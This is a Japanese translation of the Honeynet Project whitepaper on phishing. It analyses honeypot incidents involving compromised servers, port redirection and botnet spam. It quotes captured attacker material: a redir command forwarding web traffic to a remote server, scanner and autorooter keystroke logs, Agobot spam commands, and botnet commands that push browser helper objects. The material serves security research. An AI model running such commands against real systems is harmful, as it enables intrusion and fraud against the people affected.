Projects‎ > ‎Information Security‎ > ‎Honeypot‎ > ‎Whitepapers‎ > ‎

phishing

Know your Enemy:
Phishing

Behind the Scenes of Phishing Attacks

The Honeynet Project & Research Alliance
http://www.honeynet.org
Last Modified: 16th May 2005
Translated by MUKOSAKA Shin'ichi (muko [at] vogue.is.uec.ac.jp) 
Original document is here

フィッシング (phishing) は偽装したEメールやスパムによって,ユーザネーム,パスワード,アカウントのID,ATMの暗証番号,クレジットカードの内容のような機密情報をあたかも銀行や信頼できる団体に成り済まして受取人に打ち明けるように誘い込むことである. 通常,フィッシング攻撃はターゲットとなる団体を模倣したほぼ同一のウェブページから直接ユーザーの個人情報を入手し,多くの場合は被害者が攻撃に気づく前に去っていく. 攻撃者は被害者に成り済まして不正に金融取引ができるので,このような個人情報の調達はブラックハットを惹き付ける. たいてい犯罪目的で,被害者は金銭的損失を被るか全体的な個人情報を奪われる. この KnowYourEnemy ホワイトペーパーの目的は,フィッシングの実際の情報を紹介することと German Honeynet Project と UK Honeynet Project によって収集されたデータを利用することである. この文書ではハニーネットプロジェクトが自然に観測した実世界で起きた事件に焦点を当てたが,フィッシングに必要なすべての方法と技術をカバーしているわけではない. 攻撃者は絶えず技術を革新,導入,進歩させており,今日も新しい技術を発展させ,使われているだろう.

簡単な紹介と背景の後,私たちは実際のテクニックとフィッシャー (phisher) が用いたツールを三件の実例をもとに紹介し,それらをハニーネットによって捕捉した経験に基づいて研究を論じた. これらの事件の侵入のシステム,フィッシングウェブサイトの用意,メッセージの伝播,データ収集を細部にわたって記述した. フィッシングとスパミングとボットネットを統合した攻撃の共通の技術とその傾向を解析した. フィッシャーによるマルウェアを用いた例ではEメールアドレスの獲得とスパムメールの送信の自動化について論じた.さらに私たちが観測したネットワークスキャニング技術と,フィッシングEメールやスパムメールがどのように広がっていくのかを紹介した. 最後に,私たちは本文書に最近6ヶ月に得たレッスンの概要の結論を出し,更なる研究のトピックの提案した.

このホワイトペーパーは多くのサポート情報を含み,特有の攻撃の詳細なデータへの多くのハイパーリンクがある. 最後に,個人情報はこの研究で全く集めていない. 時にはフィッシング攻撃に関与する組織に直接接触し,事件のデータを自国のCERTに転送した.

序論

他人にパスワードや他の個人情報を出させるトリックは攻撃者のコミュニティの中で長い伝統を持っている. 伝統的なこの行動はソーシャルエンジニアリングのプロセスを通して行われてきた. 1990年代,相互接続のシステムとインターネットが普及し,攻撃者はプロセスの自動化と巨大な消費者市場の攻撃を始めた. 初期のシマンテックの研究でそのような活動は1998年にゴードンとチェスによって発表されている(Sarah Gordon, David M. Chess: Where There's Smoke, There's Mirrors: The Truth about Trojan Horses on the Internet, presented at the Virus Bulletin Conference in Munich, Germany, October 1998). ゴードンとチェスは AOL のマルウェアを研究したが,予想していたトロイの木馬ではなくフィッシング攻撃に直面した. フィッシングという言葉は("password harvesting fishing"『パスワードを収穫するための釣り』)詐欺のための獲得と表され,パスワードやクレジットカードの詳細などの個人情報を,本当に必要とする信頼できる者に成り済まして騙し取ることである. ゴードンとチェスによるフィッシングのメッセージを下に示す.

セクタ 4G9E の私たちのデータベースの全ての I/O 機能が失われました.
あなたのアカウントで私たちのシステムにログインしますと,私たちは登録ユーザーとして一時的に照合できます.
およそ94秒後,セクタ 4G9E にあった消失したデータの照合ができます.
現在,AOL の照合手続きによって,あなたの照合は私たちに委任されています.
『応答』をクリックし,パスワードを入力してください.
応じなかった場合には即時にアカウントは削除されます.

初期のフィッシング攻撃は主として被害者の AOL アカウントへのアクセス権を得るか,時にはクレジットカードのデータを不正な利用(例えばこのデータを用いて不正に購入するなど)のために手に入れることを目的としていた. 多くの場合,スキルのないコンピュータ利用者を欺き,本質的に“自動”のシステムや被害者が(見かけ上の)権力へ非常に信頼するメッセージを含む. 先ほどの例を説明すると,これはハードウェアやデータベースが故障し,正常なシステムの利用者が公式な文面と思うほどよく似ているものを受け取るか,非常に緊急の技術的な要求から協力を要請したというストーリーである. 例えば,「…そしてパスワードを再入力して下さい.失敗するとアカウントが削除されます.」という文を見て,利用者はその深刻な問題を避けるために大抵すぐに機密情報を入力する. 潜在的な恐ろしい結果を避けるために大抵の被害者はただちに応じ,知らないエンジニアを信用してしまう. 初期のフィッシャーの文章は若者のような表現を用い,組織性や悪意は小く,いたずらや長距離電話でアカウントデータを要求していた.

今日ではフィッシャーは信頼性のあるブランド(普通はフィッシャーがチャンスがありそうだと期待し,被害者が信頼する団体)を偽って大量のEメールを多くのエンドユーザに送るという戦略を好んで使う. 対象のブランドの公式サイトに似せたリモートウェブページへのあいまいなリンクを含むEメールが急を要する内容で送られてくると,皮肉なことに悪意のある行動から機密情報を守ろうとする. フィッシャーは被害者に信用してもらい,トリックに引っかかってくれることを望んでいる. フィッシャーがターゲットとする団体の例は,有名な銀行,クレジットカード会社,インターネット取引の会社のような金銭の支払いを本業としている団体(例えば eBay や PayPal)である. 非常に多くのフィッシング詐欺の例は Anti-Phishing Working Group のウェブサイトにあり, フィッシングEメールの大量のアーカイブや,正確に高度なフィッシャーのトリックを説明している.

次にフィッシングのコンセプトを述べた短い紹介として,私たちが捕捉したフィッシング攻撃の現在のテクニックとツールを紹介する.もしフィッシングの背景にもっと興味があるなら,より詳細な背景のページを用意した.

ツールと方法

フィッシング攻撃は一般に多くのシンプルなツールと技術に頼っている. フィッシング詐欺を支える基本的なインフラは,単純にコピーした HTML ページをウェブサーバに新たにアップロードし,サーバサイドスクリプトによってユーザの入力したデータを処理させるか,リダイレクトによってより複雑なウェブサイトに巻き込むことである.しかし一般的にそれらの目的は同一であり,信頼できるブランドの偽のウェブにユーザが入力するための場所を用意することで,そのデータが攻撃者に届くのである. 現在の HTML 編集ツールはとても簡単にターゲットに似せたウェブサイトを作ることができ,ウェブサーバに簡単に設置できる.全ての IP アドレスを調べないのであれば,一部の IP アドレスからセキュリティの低いホストを捜す. ホーム PC でさえもフィッシングのウェブサイトの効果的なホストに成り得るので,有名な企業や学校のシステムだけが狙われるわけではない. 攻撃者は大抵無差別にターゲットのコンピュータを選んでおり,純粋に大きな IP アドレスのブロックに対してランダムにセキュリティが低くて利用できるホストを探している.

あるときフィッシャーは現実的で説得力のある偽のウェブサイトを確立した.その主な変更はユーザに本来のウェブサイトから偽のウェブサイトへ進路変更させるようにしたことである. ターゲットのウェブサイトへの DNS を変更する (DNS poisoning) か,なんとかしてネットワークトラフィックをリダイレクトする (pharmingと呼ばれることもある) 能力がフィッシャーになければ,不運なユーザが偽のウェブサイトに引っかかることに頼るしかない. ひっかけるための品質を向上させ,ひっかかる範囲を広げれば,間違って偽のウェブサイトへアクセスしやすくなる (被害者の信頼や他の個人情報をフィッシャーが得られるように).

攻撃者にとって不幸なことに,(銀行や信用できる販売店) を攻撃しても,フィッシャーはターゲットとした団体の顧客がインターネット上のどこにいるかはわからない.そのためおとりを使わなければならない. しかし攻撃者はターゲットのブランドに関連するチャットルームやフォーラム (テクニカルサポートやコミュニティグループなど) に偽のウェブサイトへのハイパーリンクを載せることができる.ターゲットの団体が早く報告するので,ハイパーリンクで別のところへ移動させ,信用がなくなる前に個人情報を入力させる必要あった. しかしこれはターゲットの団体や法の執行を行う機関がトレースし,偽のウェブサイトを閉鎖させてくる可能性があるという重大なリスクを伴う. そしてフィッシャーは最小のリスクで最大の効果を出すスパムメールというパートナーを見つけたのである.

スパマー (spammer) は何百万もの有効なEメールアドレスのデータベースを持ち,最近の大量配信するEメール技術を使うことで少ないリスクで非常に多くの人に配信できる. スパムメールは大抵セキュリティの低い外国のホスト経由か,ゾンビ PC (botnet) 経由で送られ,送信者をトレースしにくくしている. セキュリティの理由からパスワードを変更するように書いてある銀行の公式なEメールや珍しい商品や知らないウェブサイトへのリンクが記載された標準的なスパムメールに立ち向かうことになるだろう. Eメールが本物であるかのように信じさせるには,策略の質を向上させるため様々な技術を扱うことである:

  • ドメインネームの代わりに IP アドレスを使ったハイパーリンクは偽のウェブサイトである. 多くのユーザは再入力を要求してくる偽のサイトのIPアドレスがターゲットの団体に登録・管理されているかチェックしない(あるいはチェックする方法を知らない).
  • 読みの似たDNSドメインを登録してよく似せた偽のウェブを設けている (すなわち,bigbank.com の代わりに b1gbank.com や bigbnk.com を使う).
  • Eメールの HTML コンテンツにハイパーリンクを埋め込み,ウェブブラウザにユーザが作る本当のウェブサイトへの大量の HTTP コネクションと偽のウェブサーバへのコネクションを作らせる. もしユーザのEメールクライアントソフトウェアが自動でコンテンツを表示させられるなら,Eメールを読みこむと直ちに偽のウェブサイトに接続できる.
  • 偽のウェブサイトの URL を符号化することでわかりにくくする. 多くのユーザは気づかないか,親切なことにハイパーリンクを開くのが当たり前だと思っている. 別の技術 (IDN spoofing) は Unicode の URL をオリジナルのウェブに似せて見せるが,実際は別のアドレスである偽のサイトにリンクさせるものである.
  • 脆弱性を利用してユーザの使っているブラウザから本質的にメッセージを隠す.マイクロソフトのインターネットエクスプローラとアウトルックは特にそのような技術 (address bar spoofing や IFrame element バグのような技術) に弱い.
  • ユーザが (ユーザネームやパスワードを) 提示するとフィッシングウェブサイトは本当のウェブサイトへユーザを進ませるが,黙ってログを取る."possword incorrect, prease retry" とエラーが出るか素直に表示されるが,どちらの場合であってもユーザは過度に不安になることはなく,不運にも悪意のある第三者の影響を受けずに打ち込んでしまう.
  • 偽のサイトをターゲットブランドの本当のウェブサイトのプロクシになるように設定し,SSL による暗号化をせずに (もしくは騙したドメインの正当な SSL 証明書を登録して) 密かに信用証明のログを取る.
  • 悪意のあるブラウザヘルパーオブジェクト (BHO) をローカルPCにインストールし,フィッシングウェブサイトへ被害者をリダイレクトする. BHO はインターネットエクスプローラのデザインをカスタマイズし制御する DLL であり,成功すると実際は偽のサイトへアクセスしたのに本当のウェブサイトへアクセスしたと信じ込ませることができる.
  • マルウェアを使用して被害者の hosts ファイルを操作し,DNS ネームと IP アドレスのローカルマップを管理する. 偽の DNS エントリをユーザの hosts ファイルに挿入することで,ウェブブラウザは実際はフィッシングウェブサイトに接続しているのに本当のウェブサイトに接続しているように見える.

多くの e-コマースや銀行のオンラインのアプリケーションが HTML にフレームやサブフレーム,その他の複雑な構造になっていることが原因で,エンドユーザは本当のウェブサイトかどうかを特定することが難しいのだろう. リストにあげたテクニックと表示されるウェブページの本当のソースを隠すことを組み合わせることで,疑り深くないユーザはフィッシングウェブサイトに誤ってアクセスし,認証の証明書や他の個人データを気づかれないうちに盗られる. ここでのポイントはフィッシャーは自由にユーザアカウントや電子的なアイデンティティを作り,使うことができ,ユーザはフィッシング攻撃の被害者となることである.

実世界のフィッシングテクニック

非常に多くのインターネットユーザは自分たちに届く詐欺メールやテクノロジのサイトのヘッドラインに悪意のあるウェブサイトのコピーの記録を見ることでフィッシング攻撃に気づき,サーバが一時的にフィッシングのコンテンツを取り上げることを望んだ. これらの出来事は被害者の視点では単一に見られる傾向がある. 大きな貢献の一つとして,ハニーネットテクノロジは攻撃者の視点で全ての行動を捕捉することを企画した.これはより完璧にフィッシング攻撃の全ての理解を促進し,セキュリティの解析をしやすくする. ハニーネットプロジェクトのリサーチアライアンスのメンバーは幸運にも充分多くのデータセットを捕捉している.このデータは,最初のセキュリティ侵害やフィッシングウェブサイトのセットアップ,大量のEメールの投稿,被害者のデータによる攻撃の各段階の説明を助けることができる. 実世界のフィッシング技術の三つの異なる代表例を示し,以下に論じた.

フィッシングテクニック その1 - 脆弱なウェブサーバを介してのフィッシング

多くのフィッシング攻撃は攻撃者が脆弱なサーバに侵入し,悪意のあるウェブコンテンツを入れることを私たちは観察している. ハニーネットテクノロジーはフィッシング攻撃の独特のライフサイクルを詳細に捕捉し,おおまかには次にあげるようなイベントを観測した.

  • 攻撃者は脆弱なサーバを探す.
  • サーバはセキュリティ侵害され,ルートキットやパスワードのバックドアをインストールされる.
  • フィッシャーはバックドアから暗号化して接続する.
  • 脆弱なサーバがウェブサーバで,既にフィッシングウェブサイトが存在した場合はダウンロードする.
  • いくつかの限られたコンテンツの設定とウェブサイトのテストを行う (最初にウェブサーバがアクセスされるとき,フィッシャーが本当のIPアドレスを露呈する可能性がある.)
  • 大量のEメール配信のためのツールがダウンロードされ,スパムメールを使って偽のウェブサイトが広告される.
  • フィッシングウェブサイトへのウェブトラフィックが増え,被害者が悪意のあるコンテンツにアクセスする可能性が増える.

大抵このライフサイクルはシステムが最初にインターネットに接続されてからたった数時間か数日のうちに起こった.私たちの研究から,多くのサーバやターゲットとなった多くの団体に一度にこのような行動を起こしたと言える. German Honeynet Project とUK Honeynet Project がそれぞれ観測した別々の事件で記録したデータより,フィッシング攻撃の共通の特徴を示す. どちらのケースでも,ハニーネットリサーチアライアンスによって脆弱な Linux のハニーポットが配置された. どちらのハニーポットにも侵入後は共通の手口が使われた:ハニーポットがスキャンされ,立て続けにセキュリティ侵害され,フィッシングウェブサイトが作られ,スパムメールを送るための大量のEメールのツールが攻撃者によってアップロードされた. 私たちが観測した他の同様の事件でも同様の攻撃を通してルートキットや IRC サーバがインストールされた. ハニーポットはフィッシング以外の目的でも使われた:ルーマニアの攻撃者から IRC ボット,場所のスキャナ,他の脆弱なコンピュータへの攻撃 (しかしハニーネットアーキテクチャはハニーポットが他のサーバに攻撃しないようにすることの開発に成功している). いくつかの面白い違いも明らかになったが,英国の事件で,異なるグループが同時にハニーポットにアクセスしてきたので,解析がより複雑になった. 簡潔さのためこの文書では特定の攻撃の詳細については記述せず,どのようにフィッシングが行われるのかだけを記述している. もし個々の攻撃の詳細をより調べたければ以下に情報をあげておく:

以下のテーブルに要因のキーと二つの事件の違いの要約を示した:

データ

ドイツの事件

英国の事件

脆弱にしたハニーポット

Redhat Linux 7.1 x86.

Redhat Linux 7.3 x86.

場所

German corporate network

英国ISPデータセンター

攻撃方法

"Superwu" autorooter.

"Mole" mass scanner.

侵入方法

Wu-Ftpd File globbing heap corruption vulnerability (CVE-2001-0550).

NETBIOS SMB trans2open バッファオーバーフロー (CAN-2003-0201).

入手されたアクセスのレベル

Root.

Root.

インストールされたルートキット

いくつかのバックドアの実行ファイルで構成されたシンプルなルートキット.

SHV4 ルートキット.

推定される攻撃者

不明.

ルーマニア国コンスタンツァ県のケーブルモデムのIPの範囲の複数グループ.

ウェブサイトによる活動

eBayと有名な米国の銀行をターゲットとした既存のフィッシングウェブサイトをダウンロードして利用.

有名な米国の銀行をターゲットとした既存のフィッシングウェブサイトをダウンロードして利用.

サーバサイドの処理

ユーザの入力で認証するPHP スクリプト

より高度にユーザの入力で認証しデータを分類するPHP スクリプト

Eメールによる活動

スパムメールを送ろうとする (example 1example 2)が,Honeywallによってブロックされる.

試験的にEメールを送信した.これはフィッシャーに送られた可能性がある.文法と文面を改良した.

多量のメールの送信法

中規模なEメールアドレスのリストを入力された基本的なPHPスクリプト

小規模なEメールアドレスのリストを入力された基本的なPHPスクリプト - 試験しただけかもしれない

被害者のトラフィックがハニーポットに到達したか

No.スパムによる広告とフィッシングウェブサイトへのアクセスがブロックされた.

Yes. 265 の HTTP リクエストが 4 日間あったが,このサーバから送信されたスパムが原因ではない. (誰もこのサーバの脆弱さについて知らない)

どちらの事件もフィッシャーのキーストロークを観察すると (Sebek によって入手した),攻撃者は既に存在するバックドアに接続し,ただちにフィッシングウェブサイトを配置したことが明らかになった. 攻撃者はサーバの環境をよく知っている者とみられ,ハニーポットに侵入したグループの一部だと言うことができ,そのフィッシング攻撃を非常に上手に準備した. アップロードされたコンテンツはたびたび他のサーバやIPアドレスから参照され,おそらくは複数のサーバで同時にこのような活動をしたのだろう.

フィッシングウェブサイトのコンテンツは攻撃者にダウンロードされて解析された.そして多くの有名なオンラインブランドを一斉にターゲットにしたことは明らかである. 既存の偽のウェブサイトをルーチン的に脆弱なサーバに配置した - スパムメールを送信するツールが必要であるとともに,複数の異なるウェブをルートに配置した 個々の"micro sites" によって複数の団体をターゲットにした. FTP セッションのディレクトリリストの作成を 観察することによっても攻撃者はフィッシングに非常に関わりがあると確認できた.英国の事件では既存のウェブコンテンツを表し,メッセージ配信ツールを中央のサーバに入れ,eBay や AOL,いくつかの有名な米国の銀行をターゲットにした. この事件では,スパムメールはたびたび被害者をハニーポットから違うウェブサーバに導いた.このことから個々のフィッシング攻撃は一つ一つのイベントが独立しているとは考えにくい. 英国のハニーポットがセキュリティ侵害された後,フィッシングコンテンツへの最初のインバウンドの HTTP リクエストもフィッシングが平行して行われていることを示している.

2004-07-23 21:23:14.118902 XXX.XXX.XXX.XXX -> 10.2.2.120 HTTP GET /.internetBankingLogon HTTP/1.1

このインバウンドの HTTP リクエストは攻撃者が偽の銀行のコンテンツをハニーポットにセットアップする前のものであり,攻撃者は事前にフィッシングウェブサイトとして使えることを知っていたと確証した. おそらく攻撃者がフィッシングウェブサイトをセットアップしている間に,スパムメッセージは他のホストから既に広告されていた.

ハニーポットの偽のオンラインの銀行のコンテンツに送られた,インバウンドの HTTP リクエストの発信元IPアドレスの範囲に私たちは驚かされた. 下に示すグラフは,ハニーポットがエンドユーザを保護するためオフラインになるまでに,個々の IP アドレスから英国のフィッシングウェブサイトへ送られた HTTP リクエストの単独での数と繰り返された数である (事件の詳細はターゲットにされた銀行でも記録された.)

英国のハニーポットのフィッシングコンテンツにアクセスした発信元を,トップレベル DNS ドメインによって国とホストオペレーティングシステムで分類した内訳はここに載せた. 注目すべきは,ハニーポットが解析のためオフラインになる前に,フィッシングウェブサイトへのウェブトラフィックは英国のハニーポットに届いていたことである.しかしこのフィッシング攻撃では HTTP POSTリクエストは PHP スクリプトから作られなかったので,ユーザのデータは奪われていない. 全ての事件をこのホワイトペーパーでは議論し,ターゲットの団体のどちらにもこの事件を報告した.多くのデータが要求に応じて利用できるように,いくつかの悪意ある活動をその国のCERT に報告した. 全ての場合においてハニーネットプロジェクトやリサーチアライアンスのメンバーが捕捉した被害者の個人データは悪用していない.

二つの例に挙げた事件のデータより,脆弱なコンピュータシステムの間を素早く移動し,一斉に複数の有名なブランドをターゲットにすることから,フィッシャーは活動的で組織的だと言える. 多くのEメールユーザが騙されてオンラインの銀行や販売店のような組織の偽のウェブサイトにアクセスし,フィッシング攻撃の被害者となっていくのである.

フィッシングテクニック その2 - ポートリダイレクトによるフィッシング

2004年 11月,German Honeynet Project はクラシックな第2世代ハニーネットと RedHat Linux 7.3 のハニーポットを配置した. しかしこの比較的古い OS は攻撃者にとって簡単にターゲットにでき,ハニーポットにセキュリティ侵害してから 2.5 ヶ月間使用された - 前述の事件でハニーポットが直ちにセキュリティ侵害されたのと対照的である. この傾向の更なる情報は KYE ホワイトペーパー "Know your Enemy: Trends"で見ることができる.

2005年1月11日,OpenSSL SSLv2の不正なクライアントキーによるバッファオーバーフローの脆弱性を利用して攻撃者はデフォルトのRedhat Linux 7.3のハニーポットのセキュリティ侵害に成功した. この事件では通常と異なり,攻撃者は一度この脆弱なシステムを手に入れてもすぐにフィッシングコンテンツをアップロードしなかった. そのかわり,攻撃者はハニーポット上でポートリダイレクトのサービスをインストールし,設定を行った.

このポートリダイレクトのサービスは HTTP リクエストのルートを変更するように設計されていた.これはハニーポットのウェブサーバからリモートウェブサーバへ通す方法である. 攻撃者はredirと呼ばれるツールをハニーポットにインストールした.これはポートリダイレクトのユーティリティであり,外から入ってくるTCPコネクションをリモートホストにフォワードするものである.この事件ではハニーポットのTCPの80番ポート (HTTP) から中国のリモートウェブサーバのTCPの80番ポート (HTTP) にリダイレクトしていた. 面白いことに攻撃者はハニーポットにルートキットをインストールして自分の存在を隠すことをしなかった.これはこの脆弱なサーバを過小評価し,正体を見破られることを特に心配しなかったためだと考えられる.

攻撃者はポートリダイレクトを確立させるために以下のコマンドを用いた:

redir --lport=80 --laddr=<IP address of honeypot> --cport=80 --caddr=221.4.XXX.XXX 

それに加えて,攻撃者は Linux システムのスタートアップファイル /etc/rc.d/rc.local を書き換え,ハニーポットシステムが再起動してもポートリダイレクトサービスが再起動するようにし,生存するチャンスが増すように改良した. その後スパムフィッシングメールを送信し,ハニーポットを宣伝した. 見つけられた文面はこのようなものであった. (注:機密事項はぼかした)

さらにフィッシャーの活動を調べるために,German Honeynet Projectのメンバーは,攻撃者がハニーポットにインストールした設定を密かに書き換えた.これによってハニーポットから広告されたスパムメールによって,ハイパーリンクをクリックしてフィッシングコンテンツにリダイレクトされた人数を容易に測定できるようになった. 36時間の間に721もの個別のIPアドレスがリダイレクトされていた.私たちはフィッシングメールによって騙される人の多さに驚かされた. ポートリダイレクトされたIPアドレスの解析結果はここに示した. (この情報はフィッシングコンテンツにアクセスしたユーザを保護し,IPアドレスは研究中以外に記録していない. 個人情報は捕捉していない.)

事件のタイムラインを以下に示した:

日時

イベント

2004年 11月 1日

初めてハニーポットのデータを探される.

2005年 1月 11日 - 19:13  

ハニーポットが OpenSSL のサービス侵害を行われ, ポートリダイレクターがインストールされ, フィッシングのスパムメールが送信された.

2005年 1月 11日 - 20:07

ハニーポットにフィッシングコンテンツへの Web リクエスト が届き始める.

2005年 1月 13日 - 8:15

ハニーポットは解析のためオフラインになった.

フィッシングテクニック その3 - ボットネットを利用したフィッシング

最近ハニーネットプロジェクトは "KYE: Tracking Botnets" でボットネットの追跡の方法について紹介した. ボットネットとは攻撃者にリモートコントロールされたコンピュータのネットワークである. 莫大なため(1万ものシステムがリンクされている),ボットネットにサービス拒否 (DoS) 攻撃をされると非常に危険である. この分野の最初の研究で,ボットネットがスパムメールを送信することに使われたこととフィッシング攻撃にも使えることが明らかにされた.2004年10月の調査で,Eメールセキュリティの CipherTrust社 は監視したフィッシングスパムメールのうちの 70% が 5 ヶ所あるアクティブなボットネットの一つから送信されていると発表したが,私たちの観察からはより多くのボットネットがスパムメールを送信していると言える. ある一つの事件の解析ではないが,このセクションでは攻撃者のボットネットを利用したフィッシングのツールとテクニックを観察したことを示す.

事件のタイムライン

2004年9月から2005年1月までの間に,ドイツハニーポットプロジェクトはパッチを当てていない Microsoft Windows をベースとしたハニーポットをボットネットの活動の観察のために設置した. ハニーポットをいくつも配置できるように自動化し,セキュリティ侵害させ,解析のためシャットダウンした. オフラインの解析によって 100 以上の個々のボットネットが観察され,1000 ものファイルを捕捉した.

解析

この脆弱なホスト上で SOCKS v4/v5 がリモートで開始されてから,本研究ではボットのソフトウェアのいくつかのバージョンを捕捉した. SOCKS は一般的なプロクシで,TCP/IP ベースのネットワークアプリケーションであり(RFC 1928),HTTP や SMTP のようにインターネットトラフィックでは有名でよく使われているプロクシである. 攻撃者が SOCKS プロクシの機能でリモートのボットにアクセスすると,このマシンはサイズの大きなスパムメールを送信できる. もしボットネットが 1000 を超える脆弱なホストで構成されているなら,攻撃者は容易にサイズの大きなメールを一度に多量に送信できる.これはたびたびホームPCユーザたちが所有する広範囲なIPアドレスから送られている.

低リスクにすると,主要目的である接触はできず,国境をまたがるのでトレースや活動を止めることが難しい.しかし高リスクにするとスパマーやフィッシャーに利用されることになる. おそらく,ボットネットのリソースを多く持つ所有者は犯罪目的で活動しており,現在ではボットネットを貸し出している可能性がある. 手数料を徴収して,ボットネットのオペレーターは SOCKS v4 が動いているサーバの IP アドレスとポートのリストを与える. これはスパムのリレーがスパマーに売られた時の証拠である:"Uncovered: Trojans as Spam Robots". ボットのソフトもEメールアドレスを収集し,ボット経由でスパムを送信する機能を実行していることを何件か捕捉した. 次のリストは Agobot が実行したスパム/フィッシングEメールの送信に関するコマンドである.Agobot は攻撃者にとって一般的に使われているボットで,私たちの研究できちんと捕捉した様々なコマンドを挙げた.

  • harvest.emails - "ボットにEメールのリストを取得させる"
  • harvest.emailshttp - "HTTPを通してボットにEメールのリストを取得させる"
  • spam.setlist - "Eメールのリストをダウンロードさせる"
  • spam.settemplate - "Eメールのテンプレートをダウンロードさせる"
  • spam.start - "スパムを開始する"
  • spam.stop - "スパムを停止する"
  • aolspam.setlist - "AOL - Eメールのリストをダウンロードさせる"
  • aolspam.settemplate - "AOL - Eメールのテンプレートをダウンロードさせる"
  • aolspam.setuser - "AOL - ユーザネームをセットする"
  • aolspam.setpass - "AOL - パスワードをセットする"
  • aolspam.start - "AOL - スパムを開始する"
  • aolspam.stop - "AOL - スパムを停止する"

これらのコマンドについてのさらなる情報は,ボットのソースコードの注釈をつけてここに示した. German Honeynet Project が IRC クライアントをカスタマイズした drone のヘルプから,スパム/フィッシングメールによる攻撃がどのように行われているのかより深く学ぶことができる.この攻撃は,私たちのハニーポットを攻撃している間に収集した接続のデータを,偽のクライアントからボットネットへ密かに通信することである. 観察した活動のいくつかの特徴的な例を以下に挙げた.

例 1

私たちが観察していたあるボットネットで攻撃者は次のコマンドを発行した(注:URL はぼかした):

<St0n3y> .mm http://www.example.com/email/fetch.php?4a005aec5d7dbe3b01c75aab2b1c9991 http://www.foobar.net/pay.html Joe did_u_send_me_this 

コマンド .mm ("大量メール配信") は spam.start コマンドをカスタマイズしたものである. このコマンドは4つのパラメータを受け付ける:

  1. いくつかのEメールアドレスも記した URL のファイル
  2. スパムメールのターゲットとなるウェブページ - 通常のスパムウェブページかフィッシングウェブページが可能
  3. 送信者の名前
  4. Eメールの件名

この場合には,fetch.php スクリプトを呼び出すとといつでも 30 の異なるEメールアドレスを返した. それぞれの受取人にはコマンドの2番目のパラメータで広告するようにEメールのメッセージが構成された. この例では,被害者のコンピュータに ActiveX コンポーネントをインストールするように要求するウェブページが指定されていた.

例 2

他のボットネットでは,ブラウザヘルパーオブジェクトが被害者の PC にインストールされることを観察した:

[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s 

.open コマンドは各ボットネットの被害者にウェブページを見せるように指示するものである. この場合にはウェブページはブラウザヘルパーオブジェクト (BHO)を含み,被害者のPCにインストールさせるようになっていた. チャンネルの名前が示す通り,このボットネットもスパムメールを送信するために使われた.

例 3

他のボットネットでは,スパイウェアの普及の例を観察した:

http://public.example.com/prompt.php?h=6d799fbeef3a9b386587f5f7b37f[...] 

このリンクはマルウェアを捕捉していたときに見つけた. これは"無料広告デリバリーソフトウェアは宣伝を提供しています"という宣伝で直接被害者を企業のウェブページへ誘導する. このウェブページにはいくつかのページがあり,ActiveXコンポーネントを訪れたクライアントにインストールしようとする.おそらくアドウェアかスパイウェアだろう.

共通テーマ

私たちの研究を通して,フィッシング攻撃のいくつかの共通テーマは攻撃者がいくつものツールとテクニックを用いて成功するようにしていることは明らかである. これより手短に二つのテクニックについて再検討する - 多量のスキャニングとコンビネーション攻撃

多量のスキャニング

ハニーポットの解析によって,自動的に攻撃するスクリプトや autorooter などのよく知られたツールを使用してシステムを攻撃することを示した. どちらの事件もフィッシングのテクニックは既に記述した.攻撃者は一度セキュリティ侵害してから autorooter というツールキットをサーバにアップロードした. 攻撃者は類似した脆弱なサーバを探すため,広域の IP アドレスをスキャンした (使用したスキャナはドイツの事件では "superwu" と呼ばれていたもので,英国の事件では "mole" と呼ばれているものが使われた.) 英国の事件で補足した攻撃者のキーストロークは以下に示した.これは脆弱なハニーポットから大量にスキャニングするタイプの例である. ハニーネットの設定により,外へ行く敵意のあるトラフィックを遮断したため,攻撃は失敗している.

攻撃者がスキャナを展開し,クラス B のネットワークのブロックをスキャンした:

[2004-07-18 15:23:31 bash 0]tar zxvf mole.tgz
[2004-07-18 15:23:33 bash 0]cd mole
[2004-07-18 15:23:38 bash 0]./mazz 63.2
[2004-07-18 15:24:04 bash 0]./mazz 207.55
[2004-07-18 15:25:13 bash 0]./scan 80.82

攻撃者が脆弱である可能性があるサーバへ侵入を企てた:

[2004-07-19 11:56:46 bash 0]cd mole
[2004-07-19 11:56:50 bash 0]./root -b 0 -v ns1.victim.net
[2004-07-19 11:57:26 bash 0]./root -b 0 -v 66.90.NNN.NNN

攻撃者にセキュリティ侵害に成功したサーバのリストが返る (ハニーネットの設定のため,このリストは空である.):

[2004-07-23 08:13:18 bash 0]cd mole
[2004-07-23 08:13:20 bash 0]ls
[2004-07-23 08:13:25 bash 0]cat hacked.servers

攻撃者は複数のクラス B ネットワークのブロックをスキャンした後,ターゲットの選択をテストした:

[2004-07-24 10:24:17 bash 0]cd mole
[2004-07-24 10:24:19 bash 0]./scan 140.130
[2004-07-24 10:24:27 bash 0]./scan 166.80
[2004-07-24 10:25:36 bash 0]./scan 166.4
[2004-07-24 10:26:23 bash 0]./scan 139.93
[2004-07-24 10:27:18 bash 0]./scan 133.200
[2004-07-24 10:36:37 bash 0]./try 202.98.XXX.XXX
[2004-07-24 10:38:17 bash 0]./try 202.98.YYY.YYY
[2004-07-24 10:38:27 bash 0]./try 202.98.YYY.YYY

この例では最後に,攻撃者によってセキュリティ侵害されたホストは,部分的な IP アドレスの範囲でハニーポットからスキャンされたものではない.協調し平行して行われた多量のスキャンの活動の証拠がこのハニーポットに残された.

英国の攻撃者によってダウンロードされた mole.tgz ファイルをさらに調べた.いくつかのテキストファイルが root ディレクトリに展開され,autorooter ツールキットとなった. これらのファイルにはスキャンの設定と,以前に "grabbb2.x と samba2.2.8 の脆弱性" をスキャンしたログがあった. クラス B ネットワークのブロックをスキャンした証拠であるこれらのファイルと共に,他のホストへ42種類の攻撃についてのファイルがあった.この事件で大きく,より組織的に類似したシステムを攻撃していることを観察した. 攻撃者の視点からスキャニングツール The mole をここに例としてあげた.

最後に,大きなスキャニングツールはハニーポットから大衆の回線に現れることはなかった.攻撃者はある程度の開発のレベルを持ち,スクリプトキディの活動を超えたツール制作者か,パブリックなフォーラムでツールを共有しない閉じたコミュニティの者であるといえる. 繰り返すが,攻撃者たちは組織的である.

コンビネーション攻撃

私たちの研究によって,このホワイトペーパーで紹介した三種類の攻撃のテクニックをたびたびフィッシャーが組み合わせたことを観察した.ときには複数の方法で冗長性を与え,二段階のネットワーク設定によってフィッシングの構造を保護した. 下図は起こりうるフィッシングのネットワークトポロジーである:

